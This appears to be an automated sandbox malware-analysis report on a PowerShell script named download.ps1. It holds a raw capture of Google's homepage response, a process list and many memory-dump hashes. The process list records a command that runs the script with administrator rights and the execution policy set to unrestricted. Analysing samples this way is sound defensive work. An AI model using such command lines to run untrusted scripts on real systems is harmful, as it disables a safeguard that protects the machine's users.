                                                                                                                    Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-npJG8sQuYYnHoX_tDI_L0g' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                    Server: gws
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    Set-Cookie: AEC=AZ6Zc-WobSp5j7ybsEDsnNFn-SW0sAgqLEmlRJookbqHrLiXXMZC8eGxVOM; expires=Sat, 21-Jun-2025 06:42:54 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                    Set-Cookie: NID=520=fr_TWIgIySB_sDICCJWEZ7QI7JoGRh0qTXKM_4rbXLtFsIKrai3K53dTFqRNNHpxbgTIEBFZtQ-7KC228sMZLHCWsC_Ub3pVzID86SOtFjQUqCpp1hIsx4_vNROFEkrDmRHuFKL3eFN7b9cX_RbBDiZU6HiAj8Gi2sxVxM_xxZmDpjd6mzRwsDOQ_wwPK8E0EjkyId0TAQ; expires=Tue, 24-Jun-2025 06:42:54 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                    Accept-Ranges: none
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Data Raw: 34 62 37 65 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73
                                                                                                                    Data Ascii: 4b7e<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images
                                                                                                                    Dec 23, 2024 07:42:55.100490093 CET1236INData Raw: 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20
                                                                                                                    Data Ascii: , videos and more. Google has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/
                                                                                                                    Dec 23, 2024 07:42:55.100503922 CET1236INData Raw: 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 67 3d 7b 6b 45 49 3a 27 62 67 5a 70 5a 2d 58 57 4a 71 50 4e 31 73 51 50 77 62 2d 78 77 41 6b 27 2c 6b 45 58 50 49 3a 27 30 2c 37 39 33 31 31 30 2c 31 35 37 37 31 2c 32 38 39 31 34 31 38 2c
                                                                                                                    Data Ascii: ">(function(){var _g={kEI:'bgZpZ-XWJqPN1sQPwb-xwAk',kEXPI:'0,793110,15771,2891418,650,435,541533,2891,79448,9707,344796,45786,9779,99404,3801,2412,50869,7734,18673,20675,1634,9708,3786,15783,27083,5203198,10476,582,182,5992089,2842721,36,23934
                                                                                                                    Dec 23, 2024 07:42:55.100744009 CET1236INData Raw: 34 35 2c 37 38 2c 33 36 31 2c 33 37 35 2c 31 31 38 2c 33 34 30 2c 31 37 31 2c 33 30 37 2c 32 38 37 2c 31 38 38 2c 31 32 39 37 2c 34 34 33 2c 32 31 30 2c 33 35 2c 35 31 35 35 2c 32 30 39 38 39 32 34 34 2c 33 35 39 39 31 35 2c 33 37 31 39 38 2c 31
                                                                                                                    Data Ascii: 45,78,361,375,118,340,171,307,287,188,1297,443,210,35,5155,20989244,359915,37198,18,2780,702,877,5228,43,159,369,185,1774,8,2065,3,1202,802,445,5985393,2038087',kBL:'2zYe',kOPI:89978449};(function(){var a;((a=window.google)==null?0:a.stvsc)?go
                                                                                                                    Dec 23, 2024 07:42:55.100759029 CET1236INData Raw: 65 3b 64 7c 7c 28 64 3d 72 28 61 2c 62 2c 65 2c 63 2c 68 29 29 3b 69 66 28 64 3d 71 28 64 29 29 7b 61 3d 6e 65 77 20 49 6d 61 67 65 3b 76 61 72 20 66 3d 6d 2e 6c 65 6e 67 74 68 3b 6d 5b 66 5d 3d 61 3b 61 2e 6f 6e 65 72 72 6f 72 3d 61 2e 6f 6e 6c
                                                                                                                    Data Ascii: e;d||(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a.onabort=function(){delete m[f]};a.src=d}};google.logUrl=function(a,b){b=b===void 0?k:b;return r("",a,b)};}).call(this);(function(){google.y={};google.sy=[]
                                                                                                                    Dec 23, 2024 07:42:55.100771904 CET1236INData Raw: 61 6d 65 3d 3d 3d 22 41 22 29 7b 61 3d 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 6e 6f 68 72 65 66 22 29 3d 3d 3d 22 31 22 3b 62 72 65 61 6b 20 61 7d 61 3d 21 31 7d 61 26 26 62 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28
                                                                                                                    Data Ascii: ame==="A"){a=a.getAttribute("data-nohref")==="1";break a}a=!1}a&&b.preventDefault()},!0);}).call(this);</script><style>#gb{font:13px/27px Arial,sans-serif;height:30px}#gbz,#gbg{position:absolute;white-space:nowrap;top:0;height:30px;z-index:100
                                                                                                                    Dec 23, 2024 07:42:55.100785971 CET1236INData Raw: 7d 2e 67 62 72 74 6c 20 2e 67 62 6d 7b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 31 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 7d 2e 67 62 74 6f 20 2e 67 62 6d 2c 2e 67 62 74 6f 20 23 67 62 73 7b 74 6f 70 3a
                                                                                                                    Data Ascii: }.gbrtl .gbm{-moz-box-shadow:1px 1px 1px rgba(0,0,0,.2)}.gbto .gbm,.gbto #gbs{top:29px;visibility:visible}#gbz .gbm{left:0}#gbg .gbm{right:0}.gbxms{background-color:#ccc;display:block;position:absolute;z-index:1;top:-1px;left:-2px;right:-2px;b
                                                                                                                    Dec 23, 2024 07:42:55.101232052 CET1236INData Raw: 62 67 74 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 7d 73 70 61 6e 23 67 62 67 36 2c 73 70 61 6e 23 67 62
                                                                                                                    Data Ascii: bgt{cursor:pointer;display:block;text-decoration:none !important}span#gbg6,span#gbg4{cursor:default}.gbts{border-left:1px solid transparent;border-right:1px solid transparent;display:block;*display:inline-block;padding:0 5px;position:relative;
                                                                                                                    Dec 23, 2024 07:42:55.101246119 CET1236INData Raw: 3a 66 6f 63 75 73 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6e 6f 6e 65 7d 2e 67 62 67 34 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 6c 69 6e 65 2d
                                                                                                                    Data Ascii: :focus{background-color:transparent;background-image:none}.gbg4a{font-size:0;line-height:0}.gbg4a .gbts{padding:27px 5px 0;*padding:25px 5px 0}.gbto .gbg4a .gbts{padding:29px 5px 1px;*padding:27px 5px 1px}#gbi4i,#gbi4id{left:5px;border:0;heigh
                                                                                                                    Dec 23, 2024 07:42:55.101259947 CET1236INData Raw: 7d 2e 67 62 6d 74 2c 2e 67 62 6d 74 3a 76 69 73 69 74 65 64 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 67 62 6d 6c 31 2c 2e 67 62 6d 6c 62 2c 2e 67 62 6d 6c 31 3a 76 69 73 69 74 65 64 2c 2e 67 62 6d 6c 62 3a 76 69 73 69 74 65 64 7b 64 69 73
                                                                                                                    Data Ascii: }.gbmt,.gbmt:visited{display:block}.gbml1,.gbmlb,.gbml1:visited,.gbmlb:visited{display:inline-block;margin:0 10px}.gbml1,.gbmlb,.gbml1:visited,.gbmlb:visited{*display:inline}.gbml1,.gbml1:visited{padding:0 10px}.gbml1-hvr,.gbml1:focus{outline:
                                                                                                                    Dec 23, 2024 07:42:55.220444918 CET1236INData Raw: 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 27 5c 30 41 5c 30 41 27 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 70 72 65 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 23 67 62 6d 70 73 7b 2a 7a 6f 6f 6d 3a 31 7d 23 67 62 64 34 20 2e 67 62
                                                                                                                    Data Ascii: :after{content:'\0A\0A';white-space:pre;position:absolute}#gbmps{*zoom:1}#gbd4 .gbpc,#gbmpas .gbmt{line-height:17px}#gbd4 .gbpgs .gbmtc{line-height:27px}#gbd4 .gbmtc{border-bottom:1px solid #bebebe}#gbd4 .gbpc{display:inline-block;margin:16px


                                                                                                                    Click to jump to process

                                                                                                                    Click to jump to process

                                                                                                                    Click to dive into process behavior distribution

                                                                                                                    Click to jump to process

                                                                                                                    Target ID:0
                                                                                                                    Start time:01:42:42
                                                                                                                    Start date:23/12/2024
                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
                                                                                                                    Imagebase:0x7ff6cb6b0000
                                                                                                                    File size:452'608 bytes
                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:1
                                                                                                                    Start time:01:42:43
                                                                                                                    Start date:23/12/2024
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Reset < >
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1609007508.00007FFB4B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B380000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4b380000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: f2c0bba9f73909e1dc2ab53c99208a36e9ed3e9bcfc61ef02017032f090170ef
                                                                                                                      • Instruction ID: adcdf2d928ab23e04d6ed9a248fc98a7db668ac8c1d248cbb9612ea4cce94607
                                                                                                                      • Opcode Fuzzy Hash: f2c0bba9f73909e1dc2ab53c99208a36e9ed3e9bcfc61ef02017032f090170ef
                                                                                                                      • Instruction Fuzzy Hash: 45F1847090DA8E8FEBA9EF28C8557E977E1FF54310F04826AE84DC72D1DB3499458B81
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1609007508.00007FFB4B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B380000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4b380000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 31180e3b5b74226cc2886d1c4ed9eb1e120138f03dfd76cab0e175b9997ca693
                                                                                                                      • Instruction ID: 6043b66f2b1e707e79bc414237e45bac387615bdf6c35fb4061e65d236d535b1
                                                                                                                      • Opcode Fuzzy Hash: 31180e3b5b74226cc2886d1c4ed9eb1e120138f03dfd76cab0e175b9997ca693
                                                                                                                      • Instruction Fuzzy Hash: A5F1B77050CA8E8FEB69EF28C8557E977E1FF94350F04826ED84DC7291DE7898458B81
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1615173791.00007FFB4B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B600000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4b600000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: P7,
                                                                                                                      • API String ID: 0-2380306839
                                                                                                                      • Opcode ID: db27a3f3a61a4cd119d54d3e0b27ba75e7079474393748bdf9662e9c99566eaa
                                                                                                                      • Instruction ID: 9fc9eb0b8fbe48720a5341a1b60adb36266d0a74447659ab129d69d3e2e07747
                                                                                                                      • Opcode Fuzzy Hash: db27a3f3a61a4cd119d54d3e0b27ba75e7079474393748bdf9662e9c99566eaa
                                                                                                                      • Instruction Fuzzy Hash: 67B204B1A1DA898FEBA5EB38C895668BBE1FF59340F1840F9D04DC7293DE389C458741
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1615173791.00007FFB4B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B600000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4b600000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: P7,
                                                                                                                      • API String ID: 0-2380306839
                                                                                                                      • Opcode ID: a9f9eb0bcdf47ea5b124619f5e83e7da9496b6ee5ec01d19f5e6ac8492fa82aa
                                                                                                                      • Instruction ID: 9cb7a114a681cc68e0d95d8585fa562b877d46725b0acc29494251abd04ffd16
                                                                                                                      • Opcode Fuzzy Hash: a9f9eb0bcdf47ea5b124619f5e83e7da9496b6ee5ec01d19f5e6ac8492fa82aa
                                                                                                                      • Instruction Fuzzy Hash: 333227A2A1DA894FEB95EF38C8A5668BBD2FF55340F1840F9D04DC7293DE38AC458741
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1609007508.00007FFB4B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B380000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4b380000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 07adf98059b0e6affe56af666e4c13d0e14ce4c23c443f38877a24c1a3b66007
                                                                                                                      • Instruction ID: c4ce4726cabec150704c1168dc3c617e269952e4ff4570dd3a91293de48eb88e
                                                                                                                      • Opcode Fuzzy Hash: 07adf98059b0e6affe56af666e4c13d0e14ce4c23c443f38877a24c1a3b66007
                                                                                                                      • Instruction Fuzzy Hash: 9912A670A1CA498FDF88EF6CC495AA977E1FFA8314F14426DE44DD7296CA34E841CB81
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1615882645.00007FFB4B630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B630000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4b630000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 4aa0e857afc038b71ddae682b0d85865178d63c83282d324b9d582b136ee831c
                                                                                                                      • Instruction ID: be745ec522688637f5142f7d95bf5efbe69a0177af3588b581c36b636035aa1c
                                                                                                                      • Opcode Fuzzy Hash: 4aa0e857afc038b71ddae682b0d85865178d63c83282d324b9d582b136ee831c
                                                                                                                      • Instruction Fuzzy Hash: 76227BB390DB894FE756AB389C15674BBE0EF46310B0841FBD58DC70A3DA299C16C792
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1615173791.00007FFB4B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B600000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4b600000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 4539d0748313dee67e1c5e05abf385ad98d93430703ede8541d8b216c92dab0c
                                                                                                                      • Instruction ID: 056abd9d04e6d761305b48c66b5a70eb777afa09ff2fcd9774920465edbea3d0
                                                                                                                      • Opcode Fuzzy Hash: 4539d0748313dee67e1c5e05abf385ad98d93430703ede8541d8b216c92dab0c
                                                                                                                      • Instruction Fuzzy Hash: F912E4B1A1DA898FEB99EB38C8956A8BBE2FF55340F1440F9D04DC7193DD38AC858741
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1615173791.00007FFB4B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B600000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4b600000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 09ec687ea248b5f09d78e55cb14a717ce27b4e3ac2fd5ef7e1b8da724fb605d4
                                                                                                                      • Instruction ID: fb80b222a4b7f56eb261e2c9bb01b0f03ff27d249d4dcfb259e9bf16f17a90c0
                                                                                                                      • Opcode Fuzzy Hash: 09ec687ea248b5f09d78e55cb14a717ce27b4e3ac2fd5ef7e1b8da724fb605d4
                                                                                                                      • Instruction Fuzzy Hash: AF12D4B1A1DA898FEB99EB38C8956A8B7D2FF59340F1440F9D04DC7193DD38AC858741
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1615173791.00007FFB4B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B600000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4b600000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 5d0dd8083ece0b032bd6a1d1a243c5c226f0ab2b748f54672a05750baff6029a
                                                                                                                      • Instruction ID: d559834359481404b39cbc33587ff90346a900b25ab5398cea940e8f22e17e07
                                                                                                                      • Opcode Fuzzy Hash: 5d0dd8083ece0b032bd6a1d1a243c5c226f0ab2b748f54672a05750baff6029a
                                                                                                                      • Instruction Fuzzy Hash: 4602D3B1A1DA894FEB99EB38C8956A8BBD2FF59340F1840F9D04DC7193DD38AC858741
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1615173791.00007FFB4B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B600000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4b600000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: f6c04a4e66672e0987339e1b6fc70e69b12a0bceb56e5d0374e9ebb5c16f4811
                                                                                                                      • Instruction ID: d5ddbe8803526973b1a3eab14037ecdff10f314252b469999a51252f21ba15cd
                                                                                                                      • Opcode Fuzzy Hash: f6c04a4e66672e0987339e1b6fc70e69b12a0bceb56e5d0374e9ebb5c16f4811
                                                                                                                      • Instruction Fuzzy Hash: 8002A3B1A1DA898FEB99EB38C8956A8BBD2FF59340F1840F9D04DC7193DD389C858741
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1615173791.00007FFB4B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B600000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4b600000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0e42814ee3976392b953ab5d8fd0424faa8af4865f88cd028665c6a74abfca44
                                                                                                                      • Instruction ID: 05a914feb1d7cff74f86c742bb0b31f1ace8de6b69c799d803102499e7f39d85
                                                                                                                      • Opcode Fuzzy Hash: 0e42814ee3976392b953ab5d8fd0424faa8af4865f88cd028665c6a74abfca44
                                                                                                                      • Instruction Fuzzy Hash: A30292A1A1DA858FEB95EB38C8956A4BBE2FF55340F1840F9D04DC7293DE38AC858741
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1615173791.00007FFB4B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B600000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4b600000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ab7b49e38aca9009d4f08d3be6340335fda654e0abd6715eb8f3a7e5018ee6c2
                                                                                                                      • Instruction ID: 463ec92eaa26c9bca37a7c8eacb4c8c6374c0feb194b960eb8dac8c03ada2837
                                                                                                                      • Opcode Fuzzy Hash: ab7b49e38aca9009d4f08d3be6340335fda654e0abd6715eb8f3a7e5018ee6c2
                                                                                                                      • Instruction Fuzzy Hash: 6DF1D5B1A1DA898FEB95EB38C895664BBE2FF56340F1840F9D04DC7193DE38AC858741
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1615173791.00007FFB4B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B600000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4b600000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 4e95697666b0d32238054827abb9f83f6b47bc548cf3200b04074b42747ad525
                                                                                                                      • Instruction ID: 1e95b77b673a0aeff8c2ede9b60ba56e132107c433d005f4272155fffec6c15f
                                                                                                                      • Opcode Fuzzy Hash: 4e95697666b0d32238054827abb9f83f6b47bc548cf3200b04074b42747ad525
                                                                                                                      • Instruction Fuzzy Hash: F0F193B1A1DA898FEB95EB38C8956A4BBE2FF55340F1440F9D04DC7193DE38AC858741
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1615173791.00007FFB4B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B600000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4b600000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 4016b17b9ad28027c5ab67bd5c09534d076f46e078af7b171479cd2c2106d98d
                                                                                                                      • Instruction ID: b1e0080b816739ad7e77f9cd6a0604971a2db7ddfa780c4eab643c7bf58e503c
                                                                                                                      • Opcode Fuzzy Hash: 4016b17b9ad28027c5ab67bd5c09534d076f46e078af7b171479cd2c2106d98d
                                                                                                                      • Instruction Fuzzy Hash: 0BF192B1A0DA898FEB95EB78C895664BBE2FF55340F1840F9D04DC7193DE38AC858741
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1609007508.00007FFB4B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B380000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4b380000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c809f8e1c492f9ab1a4bdbfc9c23536aee58447a5f24ad08779ff6f5feca0145
                                                                                                                      • Instruction ID: dc0a7a933e86674a8891d5fb6f3147c22ce2f3669687ae41af3d96e5c2fa1d40
                                                                                                                      • Opcode Fuzzy Hash: c809f8e1c492f9ab1a4bdbfc9c23536aee58447a5f24ad08779ff6f5feca0145
                                                                                                                      • Instruction Fuzzy Hash: 04B1B67050CA8D8FEB69EF28C8557E93BE1FF55350F04826EE84DC7292DA349845CB82
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1608466779.00007FFB4B26D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B26D000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4b26d000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: af71278e0fd9a37810a123855762f1b0b104d0e0baf7e287c16d848d3f2bdfd2
                                                                                                                      • Instruction ID: e0824673cf4b1a1aed07a91c585cb5ad45e87c91c9ab608f141e56254bef9025
                                                                                                                      • Opcode Fuzzy Hash: af71278e0fd9a37810a123855762f1b0b104d0e0baf7e287c16d848d3f2bdfd2
                                                                                                                      • Instruction Fuzzy Hash: E54127B140DBC44FE796AB3DD8459523FF0EF56320B1505DFE088CB1A3D625A846C7A2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1609007508.00007FFB4B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B380000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4b380000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e4169993c9b61cd4f5db6c8d4a9c5c3f757a11e28b92560d50a39251523b3add
                                                                                                                      • Instruction ID: 0661267786831aacacd21af5adeb8ed77acad29d754ced38528c19267a51fc37
                                                                                                                      • Opcode Fuzzy Hash: e4169993c9b61cd4f5db6c8d4a9c5c3f757a11e28b92560d50a39251523b3add
                                                                                                                      • Instruction Fuzzy Hash: 3831D67191CF885FDB599F5C9C466E87BE0FB99710F00426FE449C3292CA70A855CBC2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1615882645.00007FFB4B630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B630000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4b630000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 04844432a753d812b88b8b4a30cd1eee469902093e79d137a35a8e4ae6b56b86
                                                                                                                      • Instruction ID: 35bd0a87643db6ac31b68e2bf1e99a641e5e288262c28fb9ac13d2063c25ee0a
                                                                                                                      • Opcode Fuzzy Hash: 04844432a753d812b88b8b4a30cd1eee469902093e79d137a35a8e4ae6b56b86
                                                                                                                      • Instruction Fuzzy Hash: EE3124A3E1DA4A4FE3A9BB38D961238B6C1EF44310B1C51FAD64DC31A2DD2DAC11C685
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1609007508.00007FFB4B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B380000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4b380000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 6fd476bf366b7b476bbb1cba0a0a12a0ad8eeebeb32e6af40edf733787df63b7
                                                                                                                      • Instruction ID: 26816fa739488bbdec169490c5e040885ecac93873f717a3536c8fe8791e47e9
                                                                                                                      • Opcode Fuzzy Hash: 6fd476bf366b7b476bbb1cba0a0a12a0ad8eeebeb32e6af40edf733787df63b7
                                                                                                                      • Instruction Fuzzy Hash: CE21F67190CA4C4FEF58EFACD84A7E97BE0EB96321F04816BD448C3152DA74A45ACB91
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1609007508.00007FFB4B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B380000, based on PE: false
